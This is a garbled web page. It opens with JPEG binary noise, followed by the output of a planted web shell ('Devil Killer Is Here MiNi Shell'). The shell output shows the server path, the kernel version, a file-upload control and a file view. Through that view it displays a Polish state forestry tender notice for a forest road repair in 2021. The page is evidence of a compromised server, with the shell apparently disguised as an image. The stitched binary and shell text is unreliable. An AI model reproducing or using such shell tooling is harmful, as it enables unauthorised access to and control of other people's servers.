JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210927/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210927/0019373201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> "REMONT CZĘŚCI DROGI LEŚNEJ POŻAROWEJ- POSTĘPOWANIE NR 2" </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Cierpiszewo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 870218805</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sosnowa 42</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Cierpice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-165</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">56 674430</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">56 6744431</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi.cierpiszewo@torun.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://cierpiszewo.torun.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> "REMONT CZĘŚCI DROGI LEŚNEJ POŻAROWEJ- POSTĘPOWANIE NR 2" </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b1f6c63e-1fa4-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00193732</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00070622/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Remont części drogi pożarowej nr 13</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://cierpiszewo.torun.lasy.gov.pl/nadlesnictwo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między<br/>Zamawiającym, a Wykonawcami odbywa się przy użyciu portalu Josephine:<br/>https://josephine.proebiz.com/pl/, oraz poczty elektronicznej, <br/>z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu platformy Josephine.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, cyfrowego<br/>odwzorowania dokumentów w postaci papierowej (elektronicznych kopii dokumentów stworzonych w<br/>postaci papierowej) oraz informacji przekazywanych przy ich użyciu opisane zostały w Josephine-<br/>Skrócona Instrukcja- Wykonawca , która dostępna jest w zakładce Biblioteka Instrukcji i linków, w<br/>prawym górnym rogu głównego portalu Josephine Maksymalny rozmiar plików przesyłanych za<br/>pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do<br/>komunikacji wynosi 500 MB niezaszyfrowane, 300 MB zaszyfrowane</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Rozdział 19 SWZ<br/>19.1. Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z<br/>dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 –<br/>„RODO”) Zamawiający informuje, iż administratorem danych osobowych jest Nadleśnictwo<br/>Cierpiszewo Administrator wyznaczył Inspektora Ochrony Danych Osobowych p. Patryka<br/>Makowskiego, z którym w sprawach dotyczących przetwarzania danych osobowych można<br/>skontaktować się za pośrednictwem poczty elektronicznej pod adresem iod@comp-net.pl lub<br/>telefonicznie pod numerem 796 400 977. <br/>19.2. Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie<br/>zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym<br/>rozpowszechnianiem. <br/>19.3. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia<br/>korzystania ze środków ochrony prawnej, o których mowa w dziale VI PZP, do upływu terminu do ich<br/>wniesienia. <br/>19.4. Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone<br/>wyłącznie osoby posiadające upoważnienie. Osoby dopuszczone do przetwarzania takich danych są<br/>obowiązane do zachowania ich w poufności <br/>19.5. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego<br/>rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art. 255-256 PZP – w celu<br/>zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania<br/>postępowania o udzielenie zamówienia i jego archiwizacji.<br/>19.6. Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania<br/>zostanie udostępniona w oparciu o przepisy PZP.<br/>19.7. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie<br/>zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia<br/>publicznego.<br/>19.8. Niezależnie od postanowień pkt 19.7. powyżej, w przypadku zawarcia umowy w sprawie<br/>zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia<br/>roszczeń wynikających z umowy w sprawie zamówienia publicznego. <br/>19.9. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie<br/>zamówienia mogą zostać przekazane podmiotom świadczącym usługi doradcze, w tym usługi prawne, i<br/>konsultingowe, <br/>19.10. Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane w<br/>sposób zautomatyzowany</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z rozdziałem 19 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZG.270.2.3.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 697716,86 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest remont drogi leśnej pożarowej nr 13 znajdującej się na terenie<br/>Leśnictwa Chojnaty.<br/>Nadleśnictwo Cierpiszewo, oddział leśne 33, 48, 49, 47, 65, 82, 83, 97, 98, 99,111, 133, 132,<br/>155, 154, 177 obręb ewidencyjny Cierpiszewo, gmina Solec Kujawski, powiat bydgoski<br/>Zgodnie z przedmiarem stanowiącym załącznik nr 6 do niniejszej SWZ. <br/>Roboty należy wykonać zgodnie z warunkami technicznymi wykonania i odbioru robót, sztuką<br/>budowlaną oraz projektem budowlanym - załączniki do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233123-7 - Roboty budowlane w zakresie dróg podrzędnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233225-2 - Roboty budowlane w zakresie dróg jednopasmowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> +/- 30% wartości zamówienia <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert Zamawiający będzie się kierował następującymi<br/>kryteriami oceny ofert:<br/>Nazwa kryterium Waga<br/>Cena 60% (60 punktów)<br/>Okres rękojmi 40% (40 punktów)<br/>14.2. Sposób obliczania punktów:<br/>W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru: <br/>C = (Cn/Co)x 60 <br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej <br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w Ofercie (załącznik nr<br/>1 do SWZ).<br/>Oferta z najniższą ceną otrzyma maksymalną ilość punktów – 60. Pozostałe oferty zostaną przeliczone<br/>według wzoru podanego powyżej. Wynik będzie traktowany jako wartość punktowa oferty w kryterium<br/>cena oferty.<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do<br/>powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od<br/>towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>14.3. Kryterium „Okres rękojmi” rozpatrywane będzie na podstawie deklaracji (oświadczenia)<br/>Wykonawcy zawartej w Formularzu ofertowym. Oferta może uzyskać maksymalnie 40 punktów. Ocena<br/>punktowa dokonana zostanie wg poniższych zasad:<br/>Okres rękojmi liczony w latach Liczba punktów<br/>5 lat 0 pkt<br/>6 lat 20 pkt<br/>7 lat 30 pkt<br/>8 lat i powyżej 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia warunku udziału w postępowaniu w odniesieniu do występowania w<br/>obrocie gospodarczym.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>Zamawiający nie stawia warunku udziału w postępowaniu w odniesieniu do posiadania<br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej. <br/>3) sytuacji ekonomicznej lub finansowej.<br/>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że:<br/>- jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia na sumę gwarancyjną min. 700 000, 00 zł<br/>- posiada środki finansowe lub zdolność kredytową nie mniejszą niż 700 000,00 zł <br/>4) zdolności technicznej lub zawodowej.<br/>Wymagane jest spełnienie minimalnych warunków dotyczących doświadczenia zawodowego<br/>Wykonawcy oraz dysponowania odpowiednim potencjałem technicznym umożliwiającym<br/>realizację zamówienia na odpowiednim poziomie jakości.<br/>- W celu potwierdzenia doświadczenia Wykonawcy winni udokumentować zrealizowanie, w<br/>okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, przynajmniej dwóch umów, których przedmiotem<br/>zamówienia była, budowa lub remont drogi o wartości równej lub przekraczającej kwotę 700<br/>000,00 zł <br/>Wartość tej jednej umowy na wskazaną kwotę nie może być sumowana z kilku różnych umów<br/>- Warunek ten, w zakresie potencjału technicznego, zostanie uznany za spełniony, jeśli<br/>Wykonawca wykaże, że dysponuje:<br/>• jedną osobę posiadającą uprawnienia budowlane wynikające z postanowień ustawy z dnia 7<br/>lipca 1994r. Prawo budowlane (Dz. U. z 2020r. poz. 1333 z późn. zm.) do kierowania robotami<br/>budowlanymi bez ograniczeń, która będzie pełniła funkcję kierownika budowy.<br/>Ocena spełnia/nie spełnia warunków udziału w postępowaniu dokonana zostanie zgodnie z<br/>formułą "spełnia"/"nie spełnia", w oparciu o informacje zawarte w dokumentach i<br/>oświadczeniach, o których mowa w rozdziale 7. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">informację z Krajowego Rejestru Karnego w zakresie:(a) art. 108 ust. 1 pkt<br/>1 i 2 PZP, (b) art. 108 ust. 1 pkt 4 PZP, odnośnie do orzeczenia zakazu ubiegania się o zamówienie<br/>publiczne tytułem środka karnego, (c) art. 109 ust. 1 pkt 2 lit. a) PZP, (d) art. 109 ust. 1 pkt 2 lit. b) PZP,<br/>odnośnie do skazania za wykroczenie, za które wymierzono karę aresztu, (e) art. 109 ust. 1 pkt 3 PZP,<br/>odnośnie do skazania za przestępstwo lub wykroczenie, za które wymierzono karę aresztu -<br/>wystawioną nie wcześniej niż 6 miesięcy przed jej złożeniem,<br/>i) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej<br/>grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów<br/>(tekst jedn. Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę lub ofertę<br/>częściową, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego<br/>Wykonawcy należącego do tej samej grupy kapitałowej - (wzór oświadczenia Wykonawcy w zakresie<br/>art. 108 ust. 1 pkt 5 PZP o przynależności lub braku przynależności do tej grupy kapitałowej stanowi<br/>załącznik nr 13 do SWZ),<br/>j) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1) PZP, wystawione nie wcześniej<br/>niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem podatków i opłat wraz z<br/>zaświadczeniem dokumenty potwierdzające, że przed upływem terminu składania ofert Wykonawca<br/>dokonał płatności należnych podatków wraz z odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności,<br/>k) zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie<br/>zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, w zakresie art. 109 ust. 1 pkt<br/>1 PZP, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłaceniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem dokumenty potwierdzające, że przed upływem terminu składania ofert Wykonawca<br/>dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub<br/>grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>l) odpis lub informacje z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>Podmiotowe środki dowodowe wymienione zostały w pkt 7.1. lit. c - l SWZ. <br/>Wykonawca, którego oferta zostanie najwyżej oceniona, będzie obowiązany złożyć w terminie<br/>wskazanym przez Zamawiającego, nie krótszym niż 5 dni, określonym w wezwaniu wystosowanym<br/>przez Zamawiającego do Wykonawcy po otwarciu ofert w trybie art. 274 ust. 1 PZP. Dokumenty<br/>wskazane w pkt 7.1. lit. c – l powinny być aktualne na dzień ich złożenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">c) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości brutto,<br/>daty i miejsca wykonania (dat dziennych rozpoczęcia i zakończenia realizacji) oraz podmiotów, na<br/>rzecz których roboty te zostały wykonane (wzór wykazu wykonanych robót stanowi załącznik nr 15 do<br/>SWZ),<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonanych<br/>wspólnie z innymi wykonawcami informacje, o których mowa wyżej dotyczą robót faktycznie przez<br/>niego wykonanych. <br/>d) dowody, że wskazane przez Wykonawcę roboty budowlane na potwierdzenie spełnienia warunku<br/>udziału w postępowaniu dot. zdolności technicznej lub zawodowej w zakresie doświadczenia zostały<br/>wykonane należycie, <br/>Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone przez podmiot,<br/>na rzecz którego roboty budowlane zostały wykonane. Jeżeli Wykonawca z przyczyn niezależnych od<br/>niego nie jest w stanie uzyskać tych dokumentów – składa inne odpowiednie dokumenty. <br/>e) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym<br/>niż 3 miesiące przed jej złożeniem, <br/>f) dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy<br/>gwarancyjnej tego ubezpieczenia,<br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez Zamawiającego<br/>podmiotowych środków dowodowych, o których mowa w pkt 7.1. lit e)-f) SWZ, Wykonawca składa 